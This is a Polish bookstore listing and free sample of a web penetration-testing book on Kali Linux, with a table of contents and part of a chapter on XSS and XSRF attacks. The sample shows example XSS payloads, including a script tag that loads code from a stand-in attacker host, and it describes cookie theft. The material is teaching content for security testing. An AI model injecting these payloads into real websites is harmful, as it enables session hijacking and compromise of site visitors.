Cyfroteka.pl

klikaj i czytaj online

Cyfro
Czytomierz
00025 002345 23474294 na godz. na dobę w sumie
Kali Linux. Testy penetracyjne. Wydanie II - ebook/pdf
Kali Linux. Testy penetracyjne. Wydanie II - ebook/pdf
Autor: Liczba stron: 272
Wydawca: Helion Język publikacji: polski
ISBN: 978-83-283-3215-7 Data wydania:
Lektor:
Kategoria: ebooki >> komputery i informatyka >> hacking >> bezpieczeństwo systemów
Porównaj ceny (książka, ebook (-45%), audiobook).


Testowanie bezpieczeństwa aplikacji sieciowych wymaga staranności oraz aktualnej i praktycznej wiedzy.
Bardzo dobrym narzędziem do tego celu jest Kali Linux - popularna dystrybucja BackTrack systemu Linux, służąca do wykonywania audytów bezpieczeństwa. Zawiera liczne narzędzia umożliwiające zaawansowane testowanie zabezpieczeń, w tym skuteczne testy penetracyjne i techniki inżynierii wstecznej. Pozwala na zdiagnozowanie i wykorzystanie słabych stron aplikacji, co z kolei umożliwia usunięcie usterek i osiągnięcie wysokiego stopnia bezpieczeństwa.

Niniejsza książka jest znakomitym przewodnikiem dla pentesterów. Wyjaśniono w niej podstawowe pojęcia hakingu i testowania penetracyjnego. Szczegółowo opisano luki bezpieczeństwa umożliwiające wstrzykiwanie do aplikacji kodu SQL i poleceń. Omówiono często spotykane wady skryptów i mechanizmów weryfikacji danych, jak również kwestie bezpieczeństwa w odniesieniu do technologii AJAX.
Przedstawiono również technikę identyfikacji luk w aplikacjach sieciowych (fuzzing). Przede wszystkim zaś pokazano, w jaki sposób wykorzystać opisane słabe strony za pomocą narzędzi dostępnych w Kali Linux 2.0 i pokonać zabezpieczenia aplikacji.

Najciekawsze zagadnienia:

Poznaj Kali Linux - coś dla hakera i pentestera!Juned Ahmed Ansari -  jest ekspertem w zakresie bezpieczeństwa cybernetycznego. Zajmuje się testami penetracyjnymi, analizą zagrożeń, offensive security i badaniami w dziedzinie bezpieczeństwa aplikacji. Jest posiadaczem najważniejszych certyfikatów branżowych, takich jak GXPN, CISSP, CCSK i CISA. Udziela konsultacji i prowadzi sesje szkoleniowe dotyczące bezpieczeństwa informatycznego.
Poznaj Kali Linux - coś dla hakera i pentestera!

Znajdź podobne książki Ostatnio czytane w tej kategorii

Darmowy fragment publikacji:

Tytuł oryginału: Web Penetration Testing with Kali Linux, Second Edition Tłumaczenie: Łukasz Piwko ISBN: 978-83-283-3214-0 Copyright © Packt Publishing 2015. First published in the English language under the title Web Penetration Testing with Kali Linux – Second Edition (9781783988525)’. Polish edition copyright © 2017 by Helion SA All rights reserved. All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording or by any information storage retrieval system, without permission from the Publisher. Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną, a także kopiowanie książki na nośniku filmowym, magnetycznym lub innym powoduje naruszenie praw autorskich niniejszej publikacji. Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Autor oraz Wydawnictwo HELION dołożyli wszelkich starań, by zawarte w tej książce informacje były kompletne i rzetelne. Nie biorą jednak żadnej odpowiedzialności ani za ich wykorzystanie, ani za związane z tym ewentualne naruszenie praw patentowych lub autorskich. Autor oraz Wydawnictwo HELION nie ponoszą również żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce. Wydawnictwo HELION ul. Kościuszki 1c, 44-100 GLIWICE tel. 32 231 22 19, 32 230 98 63 e-mail: helion@helion.pl WWW: http://helion.pl (księgarnia internetowa, katalog książek) Drogi Czytelniku! Jeżeli chcesz ocenić tę książkę, zajrzyj pod adres http://helion.pl/user/opinie/kalil2 Możesz tam wpisać swoje uwagi, spostrzeżenia, recenzję. Printed in Poland. • Kup książkę • Poleć książkę • Oceń książkę • Księgarnia internetowa • Lubię to! » Nasza społeczność Spis tre(cid:258)ci O autorze O korektorach merytorycznych Wst(cid:218)p Rozdzia(cid:239) 1. Podstawy testów penetracyjnych i aplikacji sieciowych Aktywne testowanie zabezpiecze(cid:241) Kim jest haker Ró(cid:285)ne metodyki testowania Plan operacji Czarna czy szara skrzynka Dane kontaktowe klienta Sposób powiadamiania dzia(cid:239)u IT klienta Post(cid:218)powanie z poufnymi danymi Spotkania sprawozdawcze Ograniczenia testów penetracyjnych Dlaczego nale(cid:285)y testowa(cid:202) aplikacje sieciowe Ataki oparte na in(cid:285)ynierii spo(cid:239)ecznej Szkolenia z obrony przed atakami z u(cid:285)yciem in(cid:285)ynierii spo(cid:239)ecznej Podstawy budowy aplikacji sieciowych dla pentesterów Protokó(cid:239) HTTP Nag(cid:239)ówki (cid:285)(cid:200)dania i odpowiedzi Metody HTTP wa(cid:285)ne w kontek(cid:258)cie testów penetracyjnych (cid:165)ledzenie sesji przy u(cid:285)yciu ciasteczek Dane HTML-a w odpowiedzi HTTP Wielowarstwowe aplikacje sieciowe Podsumowanie 9 11 13 19 20 21 21 23 23 23 24 24 24 25 26 28 29 29 30 30 33 35 37 38 39 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Rozdzia(cid:239) 2. Konfiguracja (cid:258)rodowiska pracy w systemie Kali Linux Kali Linux Udoskonalenia wprowadzone w Kali Linuksie Instalowanie Kali Linuksa Wirtualizacja Kali Linuksa a instalacja na fizycznym sprz(cid:218)cie Najwa(cid:285)niejsze narz(cid:218)dzia w systemie Kali Linux Po(cid:258)redniki aplikacji sieciowych Sieciowy skaner luk w zabezpieczeniach Narz(cid:218)dzia do identyfikacji systemów CMS Fuzzery aplikacji sieciowych Testowanie penetracyjne przy u(cid:285)yciu narz(cid:218)dzia Tor Konfiguracja Tora i nawi(cid:200)zywanie anonimowego po(cid:239)(cid:200)czenia Wizualizacja (cid:285)(cid:200)dania sieciowego w Torze Kilka uwag o Torze na zako(cid:241)czenie Podsumowanie Rozdzia(cid:239) 3. Prowadzenie rekonesansu i profilowanie serwera sieciowego Rekonesans Rekonesans pasywny a rekonesans aktywny Rekonesans — zbieranie informacji Skanowanie — badanie celu Skanowanie portów za pomoc(cid:200) narz(cid:218)dzia Nmap Identyfikacja systemu operacyjnego za pomoc(cid:200) Nmap Profilowanie serwera Podsumowanie Rozdzia(cid:239) 4. Najwa(cid:285)niejsze wady aplikacji sieciowych Wycieki informacji Przegl(cid:200)danie zawarto(cid:258)ci katalogów Wady dotycz(cid:200)ce mechanizmów uwierzytelniania Protoko(cid:239)y uwierzytelniania i zwi(cid:200)zane z nimi b(cid:239)(cid:218)dy (cid:146)amanie hase(cid:239) i loginów metod(cid:200) brute force Przegl(cid:200)danie (cid:258)cie(cid:285)ki Przegl(cid:200)danie (cid:258)cie(cid:285)ki za pomoc(cid:200) narz(cid:218)dzia Burp Luki umo(cid:285)liwiaj(cid:200)ce wstrzykiwanie kodu Wstrzykiwanie polece(cid:241) Wstrzykiwanie kodu SQL Ataki typu XSS Potencja(cid:239) ataków typu XSS Ataki typu CSRF Luki dotycz(cid:200)ce sesji Sposoby kradzie(cid:285)y tokenów Narz(cid:218)dzia do analizy tokenów Ataki z wykorzystaniem spreparowanych identyfikatorów sesji Obrona przed atakami z wykorzystaniem spreparowanych identyfikatorów sesji 4 41 41 42 43 48 49 49 53 56 57 57 58 60 61 62 63 64 64 65 73 74 78 79 98 99 100 100 102 102 103 105 107 109 109 110 112 114 114 115 116 117 117 118 Poleć książkęKup książkę Luka zwi(cid:200)zana z do(cid:239)(cid:200)czaniem plików Do(cid:239)(cid:200)czanie plików zdalnych Do(cid:239)(cid:200)czanie plików lokalnych Obrona przed atakami polegaj(cid:200)cymi na do(cid:239)(cid:200)czaniu plików Zatruwanie parametrów HTTP Obrona Dzielenie odpowiedzi HTTP Obrona Podsumowanie Rozdzia(cid:239) 5. Ataki na serwer metod(cid:200) wstrzykiwania kodu Wstrzykiwanie polece(cid:241) Identyfikacja parametrów do wstrzykiwania danych Komunikaty o b(cid:239)(cid:218)dach i wstrzykni(cid:218)cia (cid:258)lepe Metaznaki do oddzielania polece(cid:241) Szukanie za pomoc(cid:200) skanera luk umo(cid:285)liwiaj(cid:200)cych wstrzykiwanie polece(cid:241) Wstrzykiwanie polece(cid:241) za pomoc(cid:200) Metasploita Wykorzystywanie luki Shellshock SQL injection Instrukcje SQL Mo(cid:285)liwo(cid:258)ci ataku z wykorzystaniem luki typu SQL injection (cid:165)lepe ataki typu SQL injection Metody testowania aplikacji pod k(cid:200)tem luk typu SQL injection Automat sqlmap BBQSQL — (cid:258)rodowisko do (cid:258)lepego wstrzykiwania kodu SQL Wstrzykiwanie kodu do baz MySQL za pomoc(cid:200) programu sqlsus sqlninja — MS SQL injection Podsumowanie Rozdzia(cid:239) 6. Luki umo(cid:285)liwiaj(cid:200)ce przeprowadzanie ataków XSS i XSRF Historia ataków typu XSS Wprowadzenie do JavaScriptu Podstawowe informacje o atakach typu XSS Typy ataków XSS Ataki XSS z utrwaleniem Refleksyjne ataki XSS Ataki XSS na DOM Ataki XSS z u(cid:285)yciem metody POST XSS i JavaScript — (cid:258)miertelna mieszanka Kradzie(cid:285) ciasteczek Rejestrowanie naciskanych klawiszy Zmiana wygl(cid:200)du witryny Skanowanie w poszukiwaniu luk typu XSS Zed Attack Proxy XSSer w3af Spis tre(cid:286)ci 119 119 119 120 120 123 123 124 124 127 128 129 130 130 131 134 138 142 142 144 145 146 147 150 151 152 154 155 156 156 157 159 159 161 161 164 165 165 166 166 167 167 172 175 5 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Luki typu XSRF Warunki powodzenia ataku Technika ataku Szukanie luk typu XSRF Techniki obrony przed atakami XSRF Podsumowanie Rozdzia(cid:239) 7. Atakowanie witryn SSL Secure Socket Layer SSL w aplikacjach sieciowych Proces szyfrowania SSL Szyfrowanie asymetryczne a szyfrowanie symetryczne Zapewnianie nienaruszalno(cid:258)ci danych za pomoc(cid:200) mieszania Identyfikacja s(cid:239)abych implementacji SSL Ataki typu man in the middle na SSL Podsumowanie Rozdzia(cid:239) 8. Przeprowadzanie ataków przy u(cid:285)yciu frameworków Socjotechnika Pakiet narz(cid:218)dzi socjotechnicznych Ataki spear phishing Ataki z u(cid:285)yciem strony internetowej Java Applet Attack Credential Harvester Attack Web Jacking Attack Metasploit Browser Exploit Tabnabbing Attack Browser Exploitation Framework Wprowadzenie do BeEF Wstrzykiwanie uchwytu BeEF Atak XSS na Mutillidae za pomoc(cid:200) BeEF Wstrzykiwanie zaczepu BeEF metod(cid:200) MITM Podsumowanie Rozdzia(cid:239) 9. AJAX i us(cid:239)ugi sieciowe — luki bezpiecze(cid:241)stwa Wprowadzenie do technologii AJAX Sk(cid:239)adniki technologii AJAX Zasada dzia(cid:239)ania technologii AJAX Kwestie bezpiecze(cid:241)stwa w odniesieniu do technologii AJAX Trudno(cid:258)ci w wykonywaniu testów penetracyjnych aplikacji AJAX Przeszukiwanie aplikacji AJAX Analizowanie kodu klienckiego — Firebug Us(cid:239)ugi sieciowe Podstawowe informacje o us(cid:239)ugach SOAP i us(cid:239)ugach REST-owych Zabezpieczanie us(cid:239)ug sieciowych Podsumowanie 6 179 179 179 180 181 182 183 184 185 186 187 189 190 196 201 203 204 205 206 209 209 210 211 212 212 214 214 215 221 223 225 227 228 229 229 232 234 234 238 241 242 243 245 Poleć książkęKup książkę Rozdzia(cid:239) 10. Fuzzing aplikacji sieciowych Podstawy fuzzingu Typy technik fuzzingu Fuzzing mutacyjny Fuzzing generacyjny Zastosowania fuzzingu Frameworki fuzzingowe Etapy fuzzingu Testowanie fuzzingowe aplikacji sieciowych Fuzzery aplikacji sieciowych w Kali Linuksie Podsumowanie Skorowidz Spis tre(cid:286)ci 247 248 249 249 250 250 252 253 254 256 263 265 7 Poleć książkęKup książkę 8 Poleć książkęKup książkę 6 Luki umo(cid:285)liwiaj(cid:200)ce przeprowadzanie ataków XSS i XSRF W epoce Web 2.0 coraz wi(cid:218)cej przedsi(cid:218)biorstw zaczyna korzysta(cid:202) z rozbudowanych aplikacji internetowych, za pomoc(cid:200) których prowadzi si(cid:218) handel elektroniczny, przeprowadza operacje bankowe, handluje na gie(cid:239)dzie, zapisuje dane metodyczne itd. Dla wygody u(cid:285)ytkownika aplikacje te zawieraj(cid:200) elementy interaktywne i przechowuj(cid:200) poufne informacje o u(cid:285)ytkowniku. Programi(cid:258)ci takich aplikacji powinni z najwy(cid:285)sz(cid:200) staranno(cid:258)ci(cid:200) podchodzi(cid:202) do kwestii bezpiecze(cid:241)stwa i podej- mowa(cid:202) wszelkie mo(cid:285)liwe (cid:258)rodki zapewniaj(cid:200)ce poufno(cid:258)(cid:202) i nienaruszalno(cid:258)(cid:202) przechowywanych w ten sposób danych. W przypadku gdy program pobiera dane od u(cid:285)ytkownika, najwi(cid:218)cej w(cid:200)tpliwo(cid:258)ci budzi fakt, (cid:285)e informacjom tym nie mo(cid:285)na ufa(cid:202). U(cid:285)ytkownik zamiast prawid(cid:239)owego loginu mo(cid:285)e wpisa(cid:202) skrypt, a zadaniem aplikacji jest wykrycie takich szkodliwych dzia(cid:239)a(cid:241). Je(cid:258)li system nie b(cid:218)dzie skutecznie oczyszcza(cid:239) danych otrzymywanych na wej(cid:258)ciu, napastnicy wykorzystaj(cid:200) to do prze- prowadzenia ataku. W tym rozdziale omawiam ataki typu XSS (ang. cross-site scripting) i XSRF (ang. cross site request forgery). W obu przypadkach bezpo(cid:258)rednim celem napastnika nie jest u(cid:285)ytkownik ko(cid:241)cowy, lecz chodzi o wykorzystanie luki w zabezpieczeniach witryny internetowej, któr(cid:200) ten u(cid:285)ytkownik odwiedza. Gdy napastnikowi uda si(cid:218) umie(cid:258)ci(cid:202) swój skrypt w takim serwisie, b(cid:218)dzie on infekowa(cid:239) wszystkich, którzy do niego wejd(cid:200). W tym rozdziale omówi(cid:239)em nast(cid:218)puj(cid:200)ce tematy: (cid:81) historia ataków typu XSS; (cid:81) podstawowe wiadomo(cid:258)ci o atakach typu XSRF; Poleć książkęKup książkę Kali Linux. Testy penetracyjne (cid:81) typy ataków XSS; (cid:81) XSS i JavaScript; (cid:81) narz(cid:218)dzia do przeprowadzania ataków XSS; (cid:81) luki typu XSRF. Historia ataków typu XSS Poj(cid:218)cia XSS i JavaScript cz(cid:218)sto mo(cid:285)na spotka(cid:202) w swoim towarzystwie. JavaScript to wykonywany u klienta skryptowy j(cid:218)zyk programowania wprowadzony do u(cid:285)ytku w 1995 r. przez firm(cid:218) Netscape. J(cid:218)zyk ten stworzono g(cid:239)ównie po to, by umo(cid:285)liwi(cid:202) wykonywanie pewnych dzia(cid:239)a(cid:241) w przegl(cid:200)darce internetowej. I cho(cid:202) JavaScriptu mo(cid:285)na u(cid:285)ywa(cid:202) tak(cid:285)e do innych celów, nadal najcz(cid:218)(cid:258)ciej znaj- duje on zastosowanie w implementacji wykonywanych w przegl(cid:200)darkach skryptów steruj(cid:200)cych prezentacj(cid:200) stron, np. wy(cid:258)wietlaj(cid:200)cych wyskakuj(cid:200)ce okienka dialogowe, gdy u(cid:285)ytkownik wpisze nieprawid(cid:239)ow(cid:200) warto(cid:258)(cid:202) w polu formularza, albo pokazuj(cid:200)cych reklamy na stronach internetowych. Niektórzy hakerzy szybko odkryli, (cid:285)e za pomoc(cid:200) JavaScriptu mo(cid:285)na odczytywa(cid:202) dane ze stron internetowych (cid:239)adowanych w s(cid:200)siednich oknach lub ramkach. Oznacza(cid:239)o to, (cid:285)e szkodliwa witryna mog(cid:239)a przekroczy(cid:202) granic(cid:218) i reagowa(cid:202) z tre(cid:258)ci(cid:200) za(cid:239)adowan(cid:200) na ca(cid:239)kiem innej stronie internetowej, pochodz(cid:200)cej z innej domeny. St(cid:200)d w(cid:239)a(cid:258)nie wzi(cid:218)(cid:239)a si(cid:218) nazwa cross-site scripting (wykonywanie skryptów mi(cid:218)dzy witrynami). Aby uniemo(cid:285)liwi(cid:202) przeprowadzanie ataków t(cid:200) metod(cid:200), firma Netscape wprowadzi(cid:239)a zasad(cid:218) wspólnego pochodzenia, w my(cid:258)l której skrypty z jednej strony maj(cid:200) dost(cid:218)p tylko do innych stron nale(cid:285)(cid:200)cych do tej samej domeny. Innymi s(cid:239)owy: uniemo(cid:285)liwiono napastnikom odczytywanie za pomoc(cid:200) JavaScriptu danych z dowolnej strony. W pierwszych latach XXI w. ataki typu XSS zyska(cid:239)y rozg(cid:239)os, poniewa(cid:285) za ich pomoc(cid:200) hakerzy zacz(cid:218)li zmusza(cid:202) strony internetowe do (cid:239)adowania szkodliwych skryptów w przegl(cid:200)darkach inter- netowych. Cho(cid:202) cele ataków XSS z biegiem lat si(cid:218) zmieni(cid:239)y, nazwa pozosta(cid:239)a ta sama, przez co niektórzy zastanawiaj(cid:200) si(cid:218), o co w tym chodzi. Hakerzy wynale(cid:283)li wiele metod wykorzystania ata- ków typu XSS, np.: do skanowania portów, rejestrowania naciskanych klawiszy czy wy(cid:258)wietlania szkodliwych reklam. Za pomoc(cid:200) ataku typu XSS mo(cid:285)na te(cid:285) wstrzykn(cid:200)(cid:202) do podatnej strony internetowej kod VBScriptu, ActiveX lub Flasha. Jednak, ze wzgl(cid:218)du na powszechno(cid:258)(cid:202) JavaScriptu, w dalszej cz(cid:218)(cid:258)ci rozdzia(cid:239)u przedstawiam przyk(cid:239)ady oparte na u(cid:285)yciu skryptów w(cid:239)a(cid:258)nie w tym j(cid:218)zyku. Wprowadzenie do JavaScriptu Na pocz(cid:200)tek pragn(cid:218) podkre(cid:258)li(cid:202), (cid:285)e j(cid:218)zyk programowania JavaScript to nie to samo co Java. Firma Netscape wybra(cid:239)a tak(cid:200) nazw(cid:218) wy(cid:239)(cid:200)cznie ze wzgl(cid:218)dów marketingowych, poniewa(cid:285) w czasie gdy powsta(cid:239) JavaScript, j(cid:218)zyk Java zdobywa(cid:239) ogromn(cid:200) popularno(cid:258)(cid:202). W dynamicznych aplikacjach sieciowych JavaScript znajduje liczne zastosowania. Skrypty mog(cid:200) by(cid:202) osadzane na stronach internetowych w specjalnych znacznikach HTML-a i mog(cid:200) pobiera(cid:202) dane z ró(cid:285)nych (cid:283)róde(cid:239), na 156 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF podstawie których budowana jest nast(cid:218)pnie ostateczna prezentacja. Prostym przyk(cid:239)adem mo(cid:285)e by(cid:202) witryna portalu spo(cid:239)eczno(cid:258)ciowego buduj(cid:200)ca stron(cid:218) profilu przez za(cid:239)adowanie obrazu, danych u(cid:285)ytkownika i starych wpisów z kilku miejsc. Poni(cid:285)ej znajduje si(cid:218) opis kilku sposobów u(cid:285)ycia JavaScriptu w kodzie HTML-a: (cid:81) Znacznik script — kod JavaScriptu mo(cid:285)na umie(cid:258)ci(cid:202) bezpo(cid:258)rednio na stronie internetowej za pomoc(cid:200) znacznika script . Na przyk(cid:239)ad: script alert( XSS ); /script (cid:81) Znacznik body — skrypt mo(cid:285)na te(cid:285) wstawi(cid:202) na stron(cid:218) przy u(cid:285)yciu zdarzenia onload w znaczniku body . Na przyk(cid:239)ad: body onload=alert( XSS ) (cid:81) Znacznik img — ten sposób wykonywania kodu JavaScriptu jest cz(cid:218)sto wykorzystywany do nieuczciwych celów. Na przyk(cid:239)ad: img src= javascript:alert( XSS ); Skrypty JavaScriptu mo(cid:285)na te(cid:285) wstawia(cid:202) na strony internetowe przy u(cid:285)yciu innych znaczników, np.: iframe , div czy link . Za pomoc(cid:200) JavaScriptu mo(cid:285)na nie tylko pobiera(cid:202) informacje z serwera, ale tak(cid:285)e wykonywa(cid:202) dzia(cid:239)ania na obiektowym modelu dokumentu (ang. Document Object Model — DOM) oraz uzyskiwa(cid:202) dost(cid:218)p do danych przegl(cid:200)darki internetowej i w(cid:239)a(cid:258)ciwo(cid:258)ci systemu operacyjnego. Wprawdzie projektanci JavaScriptu przewidzieli mo(cid:285)liwo(cid:258)(cid:202) wykonywania skryptów w bardzo ograniczonym (cid:258)rodowisku wykonawczym z niewielkimi uprawnieniami w systemie operacyjnym, ale nawet to wystarcza napastnikom do robienia pewnych bardzo nieprzyjemnych rzeczy. Za(cid:239)adowany w przegl(cid:200)darce skrypt ma dost(cid:218)p do nale(cid:285)(cid:200)cych do sesji u(cid:285)ytkownika ciasteczek i do historii otwieranych adresów URL. W ciasteczkach cz(cid:218)sto przechowuje si(cid:218) identyfikatory sesji, wi(cid:218)c je(cid:258)li haker je wykradnie, mo(cid:285)e zapanowa(cid:202) nad sesj(cid:200). Ponadto JavaScript ma te(cid:285) pe(cid:239)ny dost(cid:218)p do struktury DOM strony internetowej i mo(cid:285)e modyfikowa(cid:202) kod HTML-a strony, w zwi(cid:200)zku z czym haker mo(cid:285)e wy(cid:258)wietli(cid:202) na komputerze u(cid:285)ytkownika w(cid:239)asn(cid:200) tre(cid:258)(cid:202). Je(cid:258)li dodatkowo napast- nik zaciemni swój kod JavaScriptu, to niewprawiony w analizowaniu kodu zwyk(cid:239)y u(cid:285)ytkownik ma niewielk(cid:200) szans(cid:218) wykry(cid:202) oszustwo. DOM to logiczna struktura definiuj(cid:200)ca atrybuty i sposoby prezentacji na stronie ró(cid:285)nych obiektów (np.: tekstu, obrazów, nag(cid:239)ówków czy odno(cid:258)ników) oraz okre(cid:258)laj(cid:200)ca regu(cid:239)y manipulowania nimi. Podstawowe informacje o atakach typu XSS Mówi(cid:200)c najpro(cid:258)ciej: celem ataku typu XSS jest wykonanie szkodliwego kodu JavaScriptu w prze- gl(cid:200)darce u(cid:285)ytkownika. Skrypt ten jest dostarczany do klienta za po(cid:258)rednictwem strony interneto- wej podatnej na ataki XSS. U klienta przegl(cid:200)darka internetowa traktuje skrypty jako legaln(cid:200) cz(cid:218)(cid:258)(cid:202) 157 Poleć książkęKup książkę Kali Linux. Testy penetracyjne strony internetowej i je wykonuje. Uruchomiony w przegl(cid:200)darce ofiary skrypt mo(cid:285)e zmusi(cid:202) przegl(cid:200)dark(cid:218) do wykonania ró(cid:285)nych czynno(cid:258)ci, jak równie(cid:285) do przeprowadzenia nieuczciwych transakcji, wykradzenia ciasteczek czy przekierowania u(cid:285)ytkownika na inn(cid:200) stron(cid:218). W ataku XSS zwykle bior(cid:200) udzia(cid:239) nast(cid:218)puj(cid:200)ce podmioty: (cid:81) napastnik; (cid:81) podatna na ataki aplikacja sieciowa; (cid:81) ofiara korzystaj(cid:200)ca z przegl(cid:200)darki internetowej; (cid:81) dodatkowa witryna, do której napastnik chce przekierowa(cid:202) przegl(cid:200)dark(cid:218) lub któr(cid:200) chce zaatakowa(cid:202) za po(cid:258)rednictwem ofiary. Przeanalizujemy przyk(cid:239)ad ataku XSS: 1. Najpierw przy u(cid:285)yciu legalnych danych napastnik sprawdza podatno(cid:258)(cid:202) pól aplikacji sieciowej na ataki XSS. Obiecuj(cid:200)ce dla niego s(cid:200) pola, które zwracaj(cid:200) dane z powrotem do przegl(cid:200)darki. Przyk(cid:239)ad takiej sytuacji jest pokazany na poni(cid:285)szym rysunku. Witryna przekazuje dane za pomoc(cid:200) metody GET i wy(cid:258)wietla je w przegl(cid:200)darce: 2. Gdy napastnik wykryje s(cid:239)abo zabezpieczony parametr, za pomoc(cid:200) którego mo(cid:285)na dokona(cid:202) wstrzykni(cid:218)cia kodu, musi znale(cid:283)(cid:202) sposób na dostarczenie do u(cid:285)ytkownika szkodliwego adresu URL zawieraj(cid:200)cego kod JavaScriptu. Jednym ze sposobów jest wys(cid:239)anie fa(cid:239)szywej wiadomo(cid:258)ci e-mail b(cid:200)d(cid:283) zmuszenie ofiary do otwarcia wiadomo(cid:258)ci za pomoc(cid:200) phishingu. 3. Wiadomo(cid:258)(cid:202) e-mail powinna zawiera(cid:202) adres URL do podatnej na ataki aplikacji internetowej z do(cid:239)(cid:200)czonym kodem JavaScriptu. Gdy u(cid:285)ytkownik kliknie spreparowany odno(cid:258)nik, przegl(cid:200)darka przetworzy adres i wy(cid:258)le do witryny zawarty w nim kod. Dane w postaci skryptu JavaScriptu zostan(cid:200) zwrócone do przegl(cid:200)darki i w niej wykonane. Mo(cid:285)emy np. spróbowa(cid:202) wykona(cid:202) taki wredny kod JavaScriptu: script alert( Mam Ci(cid:218)!! ) /script . Aby tego dokona(cid:202), mogliby(cid:258)my spreparowa(cid:202) poni(cid:285)szy adres URL: http://example.org/hello.php?name= script alert( Mam Ci(cid:218)!! ) /script 158 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF 4. Metody alert cz(cid:218)sto u(cid:285)ywa si(cid:218) w demonstracjach i w celu przetestowania aplikacji pod k(cid:200)tem podatno(cid:258)ci na ataki. W dalszej cz(cid:218)(cid:258)ci tego rozdzia(cid:239)u opisuj(cid:218) te(cid:285) inne metody z u(cid:285)yciem JavaScriptu cz(cid:218)sto stosowane przez napastników. 5. Je(cid:285)eli aplikacja sieciowa jest podatna na ataki, to w przegl(cid:200)darce u(cid:285)ytkownika pojawi si(cid:218) okno dialogowe podobne do widocznego na poni(cid:285)szym rysunku: Typy ataków XSS G(cid:239)ównym celem ataku XSS jest wykonanie kodu JavaScriptu w przegl(cid:200)darce internetowej ofiary, ale cel ten mo(cid:285)na osi(cid:200)gn(cid:200)(cid:202) na wiele sposobów. Wszystko tak naprawd(cid:218) zale(cid:285)y od budowy i prze- znaczenia atakowanej witryny. Wyró(cid:285)nia si(cid:218) trzy podstawowe kategorie ataków XSS: (cid:81) atak XSS z utrwaleniem (ang. persistent XSS); (cid:81) refleksyjny atak XSS (ang. reflected XSS); (cid:81) atak XSS na DOM (ang. DOM XSS). Ataki XSS z utrwaleniem Ten rodzaj ataku XSS nazywany jest po angielsku persistent XSS lub stored XSS, poniewa(cid:285) polega na wstrzykni(cid:218)ciu danych na serwer sieciowy lub do bazy danych na serwerze, po czym aplikacja serwuje go u(cid:285)ytkownikom bez (cid:285)adnej kontroli. Tego rodzaju atak móg(cid:239)by przeprowadzi(cid:202) napastnik chc(cid:200)cy zainfekowa(cid:202) komputery wszystkich u(cid:285)ytkowników serwisu. Udana próba tego typu daje hakerowi szerokie pole do dzia(cid:239)ania. 159 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Oto typowe cele ataków XSS z utrwaleniem: (cid:81) internetowe fora dyskusyjne, (cid:81) portale spo(cid:239)eczno(cid:258)ciowe, (cid:81) serwisy z wiadomo(cid:258)ciami. Ataki XSS z utrwaleniem s(cid:200) uwa(cid:285)ane za najbardziej szkodliw(cid:200) odmian(cid:218) wszystkich ataków typu XSS, poniewa(cid:285) skrypt hakera zostaje automatycznie wstrzykni(cid:218)ty do przegl(cid:200)darki ofiary. Napast- nik nie musi dodatkowo posi(cid:239)kowa(cid:202) si(cid:218) phishingiem, aby nak(cid:239)oni(cid:202) u(cid:285)ytkownika do klikni(cid:218)cia (cid:239)(cid:200)cza. Szkodliwy skrypt zostaje wys(cid:239)any do podatnej na ataki witryny i jest przesy(cid:239)any do u(cid:285)yt- kowników podczas normalnego przegl(cid:200)dania stron. Ponadto w ataku XSS z utrwaleniem mo(cid:285)na bezpo(cid:258)rednio zaimportowa(cid:202) plik JavaScriptu ze zdalnego serwera. Poni(cid:285)szy skrypt np. b(cid:218)dzie pobiera(cid:239) ze zdalnego serwera kod JavaScriptu do wykonania: script type= text/javascript src=http://evil.store/malicious.js /script Na poni(cid:285)szym schemacie przedstawiona jest aplikacja sieciowa podatna na ataki XSS z utrwale- niem. Jest to forum internetowe, którego u(cid:285)ytkownicy mog(cid:200) tworzy(cid:202) konta i kontaktowa(cid:202) si(cid:218) z innymi u(cid:285)ytkownikami. Aplikacja zapisuje w bazie danych profile wraz z innymi danymi. Haker odkrywa, (cid:285)e ta aplikacja nie oczyszcza danych przekazanych w sekcji komentarzy, wi(cid:218)c wykorzystuje ten fakt do dodania szkodliwego kodu JavaScriptu za pomoc(cid:200) pola komentarza. Kod ten zostaje zapisany w bazie danych aplikacji. Gdy niczego niepodejrzewaj(cid:200)ca ofiara wy(cid:258)wietli który(cid:258) z komentarzy, w jej przegl(cid:200)darce internetowej zostanie wykonany wys(cid:239)any przez napastnika skrypt, który pobiera ciasteczko i wysy(cid:239)a je do zdalnego serwera znajduj(cid:200)cego si(cid:218) pod kontrol(cid:200) hakera: 160 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF Refleksyjne ataki XSS Refleksyjne ataki XSS zwane s(cid:200) te(cid:285) atakami XSS bez utrwalenia (ang. nonpersistent XSS). W ra- mach takiego ataku szkodliwy skrypt jest wysy(cid:239)any przez ofiar(cid:218) w (cid:285)(cid:200)daniu do aplikacji sieciowej, która zwraca go w odpowiedzi do przegl(cid:200)darki. W pierwszej chwili mo(cid:285)e si(cid:218) wydawa(cid:202), (cid:285)e prze- prowadzenie takiego ataku jest bardzo trudne, poniewa(cid:285) nikt z w(cid:239)asnej woli nie wy(cid:258)le szkodliwego skryptu do serwera, ale hakerzy maj(cid:200) bogaty zestaw sposobów na nak(cid:239)onienie u(cid:285)ytkownika do tego. Refleksyjne ataki XSS s(cid:200) najcz(cid:218)(cid:258)ciej skierowane na konkretne osoby, którym wysy(cid:239)a si(cid:218) fa(cid:239)szyw(cid:200) wiadomo(cid:258)(cid:202) e-mail ze skryptem do(cid:239)(cid:200)czonym do adresu URL, lub przeprowadza si(cid:218) je za pomoc(cid:200) publikacji odno(cid:258)nika w ogólnodost(cid:218)pnej witrynie i zmusza si(cid:218) u(cid:285)ytkowników do jego klikni(cid:218)cia. Je(cid:258)li dodatkowo napastnik skorzysta z 